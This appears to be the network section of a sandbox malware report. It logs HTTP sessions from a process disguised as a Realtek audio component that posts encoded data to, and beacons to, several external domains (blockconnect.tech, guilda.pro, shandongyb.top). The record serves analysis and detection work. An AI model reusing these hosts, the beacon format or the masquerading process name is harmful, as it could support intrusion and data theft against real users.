                                                                                        Data Ascii: Sb=wMF10acoaebOmkJBrPVSMFBqW98fMZo/OWIq3ABKExGGpbtp9jjsgUpuXZP/mwOztCK5iVdHPWY2nSRah4f1PKeaeJWELyI9VkxAqwNxHzjhJB+1iBCR0uyNiJ7FALIelqdOTH9ol1EgscMIT1JthHpg/VeeVFv7aF03Gnhg1HAlvYlIH7g9GR8ela6NCuVsFchD8dJleL9zFoWMFuwWbOA=
                                                                                        Dec 12, 2024 21:55:54.756758928 CET73INHTTP/1.1 405 Method Not Allowed
                                                                                        content-length: 0
                                                                                        connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        31192.168.11.204974676.223.54.146807500C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Dec 12, 2024 21:56:12.326941013 CET1289OUTPOST /b9be/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Cache-Control: max-age=0
                                                                                        Content-Length: 7367
                                                                                        Connection: close
                                                                                        Host: www.blockconnect.tech
                                                                                        Origin: http://www.blockconnect.tech
                                                                                        Referer: http://www.blockconnect.tech/b9be/
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Data Raw: 53 62 3d 77 4d 46 31 30 61 63 6f 61 65 62 4f 6d 6b 4a 42 72 50 56 53 4d 46 42 71 57 39 38 66 4d 5a 6f 2f 4f 57 49 71 33 41 42 4b 45 78 4f 47 70 6f 6c 70 39 41 37 73 79 6b 70 75 4a 4a 50 2b 6d 77 50 76 74 44 69 39 69 56 52 78 50 56 67 32 6d 78 4a 61 6f 73 72 31 59 61 65 61 63 4a 57 48 46 53 49 6f 56 6b 68 4d 71 77 64 78 48 7a 6a 68 4a 44 57 31 68 53 61 52 79 75 79 4f 6a 4a 37 7a 4b 72 4a 35 6c 71 55 78 54 48 70 65 6b 46 6b 67 74 38 38 49 52 48 52 74 39 58 70 69 32 46 66 4c 56 46 6a 34 61 46 35 49 47 6e 38 39 31 46 67 6c 73 65 6b 73 41 62 35 6d 61 67 63 32 36 4f 79 37 4e 2f 56 67 62 65 39 36 78 38 78 45 5a 37 64 6b 44 4b 43 2b 51 2b 59 47 46 5a 31 39 6a 55 39 30 55 50 37 38 42 31 74 32 72 4e 6d 46 64 64 31 67 44 42 50 39 55 42 68 73 34 51 63 46 57 59 75 4b 4c 53 4e 68 4b 57 5a 4b 5a 59 63 47 76 2f 54 55 31 2f 52 61 58 43 46 76 69 55 64 58 67 36 66 4b 55 73 55 37 41 35 63 4c 39 6f 31 71 5a 77 69 54 50 62 69 30 53 5a 57 6d 64 7a 79 67 57 71 58 4c 56 71 7a 69 43 55 79 36 4d 4e 4b 41 63 64 56 30 56 70 71 [TRUNCATED]
                                                                                        Data Ascii: Sb=wMF10acoaebOmkJBrPVSMFBqW98fMZo/OWIq3ABKExOGpolp9A7sykpuJJP+mwPvtDi9iVRxPVg2mxJaosr1YaeacJWHFSIoVkhMqwdxHzjhJDW1hSaRyuyOjJ7zKrJ5lqUxTHpekFkgt88IRHRt9Xpi2FfLVFj4aF5IGn891FglseksAb5magc26Oy7N/Vgbe96x8xEZ7dkDKC+Q+YGFZ19jU90UP78B1t2rNmFdd1gDBP9UBhs4QcFWYuKLSNhKWZKZYcGv/TU1/RaXCFviUdXg6fKUsU7A5cL9o1qZwiTPbi0SZWmdzygWqXLVqziCUy6MNKAcdV0VpqE3e7U/uVkJQgUgXbzFY6mz2nuW8/vdeTuNbovEA7/m/Z7s4dfONUQhir7kiE1GAL1T4GQfLHwQjhKkM73ygmlBp1sNySSjj/hyVEKJomz+xGmhRddVMGAgFHEpLL6Ouvz+m5Vkx/GcSd+rTp03ZAJC3sQWgLqaUkQiDpcQbqArGYrnheQQSHPpiuU0Al7nRIyul21UZL4l35GgxfGSdqLbNEYAvorIIZDrEgWidK3lJ2d9vdbMlpbybZRSuVrsPub58GlH8B8wvymF9nRpOxYXmML5Ny8ImY3vfPxG0tYLjaVC/hRVSqTkCbMWxAqCE8wB1Y8fBZi0BifR6DiLHRNu+SSht9FS5eDj2YztQQh3Ggg2cGpxC+Tv1gjFbhcB+AQa/oGdSrQtelGljfxz6OICCd1bP2MSyO7p0oPEI4n7Y6at+Aq4KZ5ymkFSCLyOWDHBn3Gg2AAP3iLr0s/MU4ymy2v5UVrtNon0VqZLCfJV
                                                                                        Dec 12, 2024 21:56:12.458286047 CET73INHTTP/1.1 405 Method Not Allowed
                                                                                        content-length: 0
                                                                                        connection: close
                                                                                        Dec 12, 2024 21:56:12.458523035 CET1289OUTData Raw: 67 30 33 46 62 4f 2b 71 41 39 32 33 2b 65 4b 77 32 66 52 73 33 48 4a 35 44 79 32 4e 6e 6a 6c 65 64 49 39 46 53 44 30 52 37 45 6c 5a 6a 59 7a 70 78 67 50 5a 43 58 4d 54 32 30 6a 7a 6a 64 75 51 2b 30 63 6c 73 39 4d 69 73 49 6b 57 54 38 79 36 50 4d
                                                                                        Data Ascii: g03FbO+qA923+eKw2fRs3HJ5Dy2NnjledI9FSD0R7ElZjYzpxgPZCXMT20jzjduQ+0cls9MisIkWT8y6PMePoCh4TEdL64cRiZ09rTmdmgXXvOLUlU0C7qyQHFAW/K9BPGR+00v2YhK+Q8LjUXcrHGbE9gnw1N4vXa5RMqqGHxbS4mvmcazi2oVz0BWcAqAG4dpc/m1iJ2SS9n0wN1XIAkUpghgpM5J3ug+tun+V388m/XCP/Tw
                                                                                        Dec 12, 2024 21:56:12.458574057 CET1289OUTData Raw: 75 68 5a 46 46 55 4b 38 46 5a 6f 64 33 47 52 30 57 66 53 36 6b 72 49 39 43 59 71 57 65 58 4c 34 35 31 71 38 51 56 74 34 55 4c 4d 4d 61 2b 6f 2b 4f 6f 2f 43 68 55 41 73 78 42 47 5a 77 41 47 41 7a 6c 75 42 76 37 4f 6c 6f 77 6c 4d 67 44 6a 66 45 63
                                                                                        Data Ascii: uhZFFUK8FZod3GR0WfS6krI9CYqWeXL451q8QVt4ULMMa+o+Oo/ChUAsxBGZwAGAzluBv7OlowlMgDjfEcvJWXUFxiBNPdPIPKvhd5Fwnkmpv6m80a1uNY9UbfuSqf0ibAs231z4uKK9ex/L2z3j1mPOsYJXC2KW7EMtJHB63ukRtp6sBFGN0PpjFcpOOkjswU6fpTJVEbXywTnv3+2joRBHWkLKXm4B8rjL92H8whKcAHkX8ed
                                                                                        Dec 12, 2024 21:56:12.590008020 CET1289OUTData Raw: 4d 37 5a 54 66 5a 50 76 77 64 66 5a 76 58 2f 6d 5a 76 52 51 71 33 67 71 42 7a 34 35 75 72 51 69 36 6f 69 31 75 69 62 35 31 53 55 49 64 62 33 38 78 55 51 71 7a 2b 41 44 38 79 4a 4c 30 4d 65 5a 47 42 48 79 59 79 61 65 76 2b 52 75 4f 4b 4c 72 71 58
                                                                                        Data Ascii: M7ZTfZPvwdfZvX/mZvRQq3gqBz45urQi6oi1uib51SUIdb38xUQqz+AD8yJL0MeZGBHyYyaev+RuOKLrqXV7Df5EJezm2HzMTvleSraoYc7ItCEv15s92s/AomMYRkuuprUiSReu9PLWm3nLTr+EHfDg4zdjOMwehO6DrFiKwXSfjb3JVeLz0Q2w3B7yvg4CQkGx2+R4s2jScHx0iYpDhttOWaBxuPn/kuMhzAUIDhA8ddu/KJd
                                                                                        Dec 12, 2024 21:56:12.590059042 CET2672OUTData Raw: 31 69 6a 35 4a 55 6e 32 4e 56 6e 2b 6b 58 69 47 53 49 34 78 2b 73 52 30 4d 4f 64 43 47 51 61 51 6c 31 72 4a 4d 38 5a 74 61 73 69 5a 58 32 6e 4b 55 4c 35 79 78 51 4c 37 45 35 4a 48 37 6b 66 71 6b 71 69 38 39 4b 79 75 4b 35 70 36 62 4e 58 31 39 43
                                                                                        Data Ascii: 1ij5JUn2NVn+kXiGSI4x+sR0MOdCGQaQl1rJM8ZtasiZX2nKUL5yxQL7E5JH7kfqkqi89KyuK5p6bNX19CFN7KvBq5M/HW7el2wWNfAxBqDk2j5P1gG2MGbl2WAZJZLsj68T7KayaX5+JpWlQFHRdvNuDS/4fH5GAjJV/eTyAVNbWDYBL+giY2q27pKRcY2/9Nr8WGgVJD3v5ljwF/j3QUDy8cqd7692aoBzLTViIQpFU+CcOgK


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        32192.168.11.204974776.223.54.146807500C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Dec 12, 2024 21:56:14.982254982 CET387OUTGET /b9be/?Sb=9OtV3uwQRtibrVA4hLtUEhtAbrgSLeETN2Bs+yR1Dw7urrZ54AC3m2EUc6XgmT690RzFqG8rClBthhFIppTUTpiMaaqCJj4lBnElnRAnP0SDGQ+vlziE68E=&Hsa=KVXAK1dJ22EyzD HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Connection: close
                                                                                        Host: www.blockconnect.tech
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Dec 12, 2024 21:56:15.116914034 CET378INHTTP/1.1 200 OK
                                                                                        content-type: text/html
                                                                                        date: Thu, 12 Dec 2024 20:56:15 GMT
                                                                                        content-length: 257
                                                                                        connection: close
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 53 62 3d 39 4f 74 56 33 75 77 51 52 74 69 62 72 56 41 34 68 4c 74 55 45 68 74 41 62 72 67 53 4c 65 45 54 4e 32 42 73 2b 79 52 31 44 77 37 75 72 72 5a 35 34 41 43 33 6d 32 45 55 63 36 58 67 6d 54 36 39 30 52 7a 46 71 47 38 72 43 6c 42 74 68 68 46 49 70 70 54 55 54 70 69 4d 61 61 71 43 4a 6a 34 6c 42 6e 45 6c 6e 52 41 6e 50 30 53 44 47 51 2b 76 6c 7a 69 45 36 38 45 3d 26 48 73 61 3d 4b 56 58 41 4b 31 64 4a 32 32 45 79 7a 44 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Sb=9OtV3uwQRtibrVA4hLtUEhtAbrgSLeETN2Bs+yR1Dw7urrZ54AC3m2EUc6XgmT690RzFqG8rClBthhFIppTUTpiMaaqCJj4lBnElnRAnP0SDGQ+vlziE68E=&Hsa=KVXAK1dJ22EyzD"}</script></head></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        33192.168.11.204974852.223.13.41807500C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Dec 12, 2024 21:56:20.474040985 CET638OUTPOST /1w6c/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Cache-Control: max-age=0
                                                                                        Content-Length: 199
                                                                                        Connection: close
                                                                                        Host: www.guilda.pro
                                                                                        Origin: http://www.guilda.pro
                                                                                        Referer: http://www.guilda.pro/1w6c/
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Data Raw: 53 62 3d 33 67 50 55 33 77 30 35 6f 46 6d 51 6b 59 66 65 74 37 47 38 42 6d 77 6f 76 35 58 39 31 57 5a 74 78 67 64 32 6d 77 72 58 69 76 67 58 77 66 41 65 7a 39 41 51 54 4f 51 48 47 36 41 4e 6e 4b 69 79 6a 38 48 42 71 32 73 67 4c 33 6e 36 4d 58 2b 62 70 68 5a 73 4b 74 59 31 72 77 30 52 6d 7a 59 67 59 4f 33 42 30 6e 38 67 50 31 73 2b 33 53 61 74 56 7a 30 4b 35 75 59 32 68 39 53 46 6f 69 54 4b 58 4a 35 39 5a 42 59 49 2f 66 52 69 61 4d 52 75 2b 43 35 36 43 44 4a 2b 38 75 4e 46 6c 47 6a 37 4b 58 50 4a 76 32 2f 50 65 47 64 41 6c 49 6b 68 63 42 6d 50 72 56 46 4c 63 51 75 4d 4b 72 4a 56 36 67 3d 3d
                                                                                        Data Ascii: Sb=3gPU3w05oFmQkYfet7G8Bmwov5X91WZtxgd2mwrXivgXwfAez9AQTOQHG6ANnKiyj8HBq2sgL3n6MX+bphZsKtY1rw0RmzYgYO3B0n8gP1s+3SatVz0K5uY2h9SFoiTKXJ59ZBYI/fRiaMRu+C56CDJ+8uNFlGj7KXPJv2/PeGdAlIkhcBmPrVFLcQuMKrJV6g==
                                                                                        Dec 12, 2024 21:56:20.604863882 CET73INHTTP/1.1 405 Method Not Allowed
                                                                                        content-length: 0
                                                                                        connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        34192.168.11.204974952.223.13.41807500C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Dec 12, 2024 21:56:23.117257118 CET658OUTPOST /1w6c/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Cache-Control: max-age=0
                                                                                        Content-Length: 219
                                                                                        Connection: close
                                                                                        Host: www.guilda.pro
                                                                                        Origin: http://www.guilda.pro
                                                                                        Referer: http://www.guilda.pro/1w6c/
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Data Raw: 53 62 3d 33 67 50 55 33 77 30 35 6f 46 6d 51 6c 34 50 65 6f 59 75 38 48 47 77 70 71 35 58 39 6a 6d 59 46 78 67 42 32 6d 31 4f 63 69 63 45 58 77 36 38 65 77 34 30 51 51 4f 51 48 4f 61 41 45 71 71 69 6c 6a 38 4c 7a 71 79 77 67 4c 33 6a 36 4d 57 4f 62 71 51 5a 76 4c 39 59 4e 7a 41 30 54 69 7a 59 67 59 4f 33 42 30 6e 6f 4b 50 31 30 2b 32 68 53 74 56 57 49 4a 77 4f 59 31 69 39 53 46 73 69 54 4f 58 4a 35 62 5a 44 73 32 2f 5a 56 69 61 4e 68 75 2b 54 35 6c 49 44 4a 34 7a 4f 4d 31 73 44 36 77 44 47 32 39 69 52 6e 55 54 47 6c 30 6b 65 70 37 42 7a 53 72 6f 47 5a 35 59 67 58 6b 49 70 49 4f 6e 6e 65 30 79 76 69 71 6a 69 79 36 33 51 71 72 47 67 36 34 6a 35 41 3d
                                                                                        Data Ascii: Sb=3gPU3w05oFmQl4PeoYu8HGwpq5X9jmYFxgB2m1OcicEXw68ew40QQOQHOaAEqqilj8LzqywgL3j6MWObqQZvL9YNzA0TizYgYO3B0noKP10+2hStVWIJwOY1i9SFsiTOXJ5bZDs2/ZViaNhu+T5lIDJ4zOM1sD6wDG29iRnUTGl0kep7BzSroGZ5YgXkIpIOnne0yviqjiy63QqrGg64j5A=
                                                                                        Dec 12, 2024 21:56:23.248136044 CET73INHTTP/1.1 405 Method Not Allowed
                                                                                        content-length: 0
                                                                                        connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        35192.168.11.204975052.223.13.41807500C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Dec 12, 2024 21:56:25.759191036 CET2578OUTPOST /1w6c/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Cache-Control: max-age=0
                                                                                        Content-Length: 7367
                                                                                        Connection: close
                                                                                        Host: www.guilda.pro
                                                                                        Origin: http://www.guilda.pro
                                                                                        Referer: http://www.guilda.pro/1w6c/
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Data Raw: 53 62 3d 33 67 50 55 33 77 30 35 6f 46 6d 51 6c 34 50 65 6f 59 75 38 48 47 77 70 71 35 58 39 6a 6d 59 46 78 67 42 32 6d 31 4f 63 69 63 4d 58 77 49 45 65 71 66 6f 51 52 4f 51 48 4e 61 41 4a 71 71 69 6b 6a 38 43 36 71 31 35 62 4c 31 72 36 4d 77 53 62 72 69 78 76 46 39 59 4e 76 77 30 57 6d 7a 5a 67 59 4f 6e 4e 30 6e 34 4b 50 31 30 2b 32 67 69 74 42 54 30 4a 32 4f 59 32 68 39 53 5a 6f 69 53 62 58 4a 51 75 5a 44 70 4e 2f 70 31 69 62 74 78 75 78 42 68 6c 53 44 4a 36 2f 75 4d 74 73 44 2b 2f 44 46 44 47 69 56 76 75 54 46 56 30 6c 36 55 6a 63 78 47 75 2b 6e 31 6f 63 55 54 65 4b 5a 55 52 6b 67 54 4e 31 64 69 71 2f 47 57 42 7a 52 47 44 54 67 32 6d 34 5a 31 55 52 4d 7a 4c 63 30 45 42 42 72 61 32 65 6f 61 74 41 67 54 58 6a 42 6f 78 44 53 72 54 79 70 58 34 35 6d 68 58 2b 65 49 50 65 54 62 61 71 6f 31 2f 57 33 6c 30 61 31 79 51 64 4d 46 49 78 74 38 56 36 4b 49 66 6c 64 32 71 38 6c 36 52 62 67 31 74 48 36 65 42 68 64 42 4a 6a 35 48 46 4e 67 73 4c 4b 49 30 61 76 61 62 6a 61 59 70 75 4a 38 39 6d 32 4d 6d 43 74 50 39 [TRUNCATED]
                                                                                        Data Ascii: Sb=3gPU3w05oFmQl4PeoYu8HGwpq5X9jmYFxgB2m1OcicMXwIEeqfoQROQHNaAJqqikj8C6q15bL1r6MwSbrixvF9YNvw0WmzZgYOnN0n4KP10+2gitBT0J2OY2h9SZoiSbXJQuZDpN/p1ibtxuxBhlSDJ6/uMtsD+/DFDGiVvuTFV0l6UjcxGu+n1ocUTeKZURkgTN1diq/GWBzRGDTg2m4Z1URMzLc0EBBra2eoatAgTXjBoxDSrTypX45mhX+eIPeTbaqo1/W3l0a1yQdMFIxt8V6KIfld2q8l6Rbg1tH6eBhdBJj5HFNgsLKI0avabjaYpuJ89m2MmCtP9AgEjRGxrc/eGSo8q67S0aBTu9dQf8FMAWayAzh6pRhVg7yZMOTmZAAb2UVTmDoS2SyS4ha2EBUbgKEIqETs6ck3Ow8RAu8cPvOjwnxTf0mAMApvaQ5dW+hEROaDOHk8rb+NnJVpoIwJjnkJ506jbU8HTk/26mjxK9lV83IvdF3iiGA8z8ZyR/oeoseA6EGtAvf9NmizBg5rFVfdHylnH1AnmJlxoJPwJ3FUnx8IRZa6l8opwO6dmlAyKtKzZcci0amvTqYls7iTJhQ6MWoWgXntK65QtxsNNx1fVyzbibhRYLjBbK6zl26T6yrsEHONyOxlsHwJbR5S7UsF9gU05UjtiDbEQYBG53xYNThotMHe2UWhuCs8dcTgmPyaL2sfebFLDIZzbdnHF6mUmuNQ+qzwt/VBLuAvtwjEPQcLbLeARQJRFM4iQKlyFYpZBzioleYIsuzCDKpsCmyyACuEl/XV09FD2K68KXst6L6rc4SxFSzhQrq+Xfh21CdOiibhPvE/A3FihbtI1QSkUaWG/r9iIXUqDbc6z8PKFzcXXDHWJCtRA4HKCyXfQBdliLZ99YMmIjEX09ki8629os69s7w+qewvZHvSvUv1GSeaBjLzWG6zng7tG2WFLGeL6/J5FslVppJS1/sD+RIvfAx9SghqD+tPcWYCJ80 [TRUNCATED]
                                                                                        Dec 12, 2024 21:56:25.759254932 CET5229OUTData Raw: 59 78 5a 54 49 4d 4a 6b 75 64 64 4d 77 5a 41 37 57 70 38 78 73 6e 42 47 56 61 4e 64 6e 34 6c 2b 4f 68 30 43 4d 6f 78 73 6e 48 66 48 2b 62 50 33 51 54 78 65 51 36 38 63 75 47 52 31 52 70 2b 48 74 4f 45 6e 4d 43 45 68 56 4c 77 48 59 41 6b 79 48 44
                                                                                        Data Ascii: YxZTIMJkuddMwZA7Wp8xsnBGVaNdn4l+Oh0CMoxsnHfH+bP3QTxeQ68cuGR1Rp+HtOEnMCEhVLwHYAkyHDNhONN089DSlJMAfKN6LMPNboRRgNNqq9lkGCCxuIWfEBHEVGfKt0JCdeOVNImVycjBFEz+zSYJdAd/3UKS+00qs+gclCZeDG2VawZZaVKnBlDnvfkyoQJfIcI/Lboo8Ikh4aBPn+l5ZPVqP6Fv9e9PZjyirzSzTFs
                                                                                        Dec 12, 2024 21:56:25.889538050 CET73INHTTP/1.1 405 Method Not Allowed
                                                                                        content-length: 0
                                                                                        connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        36192.168.11.204975152.223.13.41807500C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Dec 12, 2024 21:56:28.397562981 CET380OUTGET /1w6c/?Hsa=KVXAK1dJ22EyzD&Sb=6in00ENShVrGnKChmbChIXNbgO3p2TpRxDoWlxyauu1a14sApsVuao58PKEy9ZfMqdeygU8jDVXPCne7mQVbEOArj0ZOnhNCf8Kk2mpmREY64SemV0EG5N4= HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Connection: close
                                                                                        Host: www.guilda.pro
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Dec 12, 2024 21:56:28.529567003 CET378INHTTP/1.1 200 OK
                                                                                        content-type: text/html
                                                                                        date: Thu, 12 Dec 2024 20:56:28 GMT
                                                                                        content-length: 257
                                                                                        connection: close
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 48 73 61 3d 4b 56 58 41 4b 31 64 4a 32 32 45 79 7a 44 26 53 62 3d 36 69 6e 30 30 45 4e 53 68 56 72 47 6e 4b 43 68 6d 62 43 68 49 58 4e 62 67 4f 33 70 32 54 70 52 78 44 6f 57 6c 78 79 61 75 75 31 61 31 34 73 41 70 73 56 75 61 6f 35 38 50 4b 45 79 39 5a 66 4d 71 64 65 79 67 55 38 6a 44 56 58 50 43 6e 65 37 6d 51 56 62 45 4f 41 72 6a 30 5a 4f 6e 68 4e 43 66 38 4b 6b 32 6d 70 6d 52 45 59 36 34 53 65 6d 56 30 45 47 35 4e 34 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Hsa=KVXAK1dJ22EyzD&Sb=6in00ENShVrGnKChmbChIXNbgO3p2TpRxDoWlxyauu1a14sApsVuao58PKEy9ZfMqdeygU8jDVXPCne7mQVbEOArj0ZOnhNCf8Kk2mpmREY64SemV0EG5N4="}</script></head></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        37192.168.11.2049752198.2.236.225807500C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Dec 12, 2024 21:56:34.063170910 CET650OUTPOST /f7zl/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Cache-Control: max-age=0
                                                                                        Content-Length: 199
                                                                                        Connection: close
                                                                                        Host: www.shandongyb.top
                                                                                        Origin: http://www.shandongyb.top
                                                                                        Referer: http://www.shandongyb.top/f7zl/
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Data Raw: 53 62 3d 45 72 39 6a 59 65 70 35 7a 69 4c 61 69 5a 39 30 71 43 38 4f 57 67 42 43 35 6c 2b 44 6b 35 31 72 2f 58 2b 33 31 37 4e 44 67 36 32 62 42 50 51 6b 36 44 74 41 71 4d 78 62 4a 56 6b 6b 32 30 56 6f 6f 44 68 39 54 79 6b 2f 52 4d 6f 63 74 62 6a 63 73 68 7a 30 73 72 4c 41 34 48 6d 59 37 5a 6a 45 59 33 45 69 79 79 4e 43 48 69 36 79 66 38 41 74 44 73 53 33 45 61 6a 74 4c 75 42 55 4e 35 46 33 55 2b 7a 6a 79 34 52 72 65 6f 34 4c 7a 6e 58 6a 30 70 79 35 49 51 37 7a 6e 46 76 6e 54 51 2b 67 57 46 49 78 77 55 38 54 34 6d 6c 6f 58 70 57 66 51 57 33 69 32 79 61 7a 31 4e 54 4d 50 64 6b 75 6d 41 3d 3d
                                                                                        Data Ascii: Sb=Er9jYep5ziLaiZ90qC8OWgBC5l+Dk51r/X+317NDg62bBPQk6DtAqMxbJVkk20VooDh9Tyk/RMoctbjcshz0srLA4HmY7ZjEY3EiyyNCHi6yf8AtDsS3EajtLuBUN5F3U+zjy4Rreo4LznXj0py5IQ7znFvnTQ+gWFIxwU8T4mloXpWfQW3i2yaz1NTMPdkumA==
                                                                                        Dec 12, 2024 21:56:34.234461069 CET146INHTTP/1.1 404 Not Found
                                                                                        Transfer-Encoding: chunked
                                                                                        Server: Microsoft-HTTPAPI/2.0
                                                                                        Date: Thu, 12 Dec 2024 20:56:33 GMT
                                                                                        Connection: close
                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        38192.168.11.2049753198.2.236.225807500C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Dec 12, 2024 21:56:36.767438889 CET670OUTPOST /f7zl/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Cache-Control: max-age=0
                                                                                        Content-Length: 219
                                                                                        Connection: close
                                                                                        Host: www.shandongyb.top
                                                                                        Origin: http://www.shandongyb.top
                                                                                        Referer: http://www.shandongyb.top/f7zl/
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Data Raw: 53 62 3d 45 72 39 6a 59 65 70 35 7a 69 4c 61 6a 39 35 30 74 68 45 4f 58 41 42 42 31 46 2b 44 76 5a 31 76 2f 58 79 33 31 2b 74 54 67 6f 69 62 41 71 73 6b 6f 53 74 41 72 4d 78 62 48 31 6c 67 79 30 56 64 6f 44 74 50 54 33 63 2f 52 4d 55 63 74 62 54 63 76 53 62 37 6a 62 4c 4f 78 6e 6d 61 6d 4a 6a 45 59 33 45 69 79 79 70 37 48 69 69 79 66 74 77 74 44 4e 53 77 4d 36 6a 75 4d 75 42 55 62 4a 46 7a 55 2b 79 30 79 35 39 42 65 71 77 4c 7a 6c 66 6a 33 34 79 34 54 67 37 31 70 6c 75 46 56 79 37 55 56 31 34 2f 32 47 41 31 31 48 39 39 57 2f 62 46 4e 6b 44 47 31 68 47 42 78 39 71 6b 4e 66 6c 31 37 4f 66 4f 68 78 57 6b 30 35 47 76 67 47 47 39 34 55 6e 5a 46 58 49 3d
                                                                                        Data Ascii: Sb=Er9jYep5ziLaj950thEOXABB1F+DvZ1v/Xy31+tTgoibAqskoStArMxbH1lgy0VdoDtPT3c/RMUctbTcvSb7jbLOxnmamJjEY3Eiyyp7HiiyftwtDNSwM6juMuBUbJFzU+y0y59BeqwLzlfj34y4Tg71pluFVy7UV14/2GA11H99W/bFNkDG1hGBx9qkNfl17OfOhxWk05GvgGG94UnZFXI=
                                                                                        Dec 12, 2024 21:56:36.936269999 CET146INHTTP/1.1 404 Not Found
                                                                                        Transfer-Encoding: chunked
                                                                                        Server: Microsoft-HTTPAPI/2.0
                                                                                        Date: Thu, 12 Dec 2024 20:56:36 GMT
                                                                                        Connection: close
                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
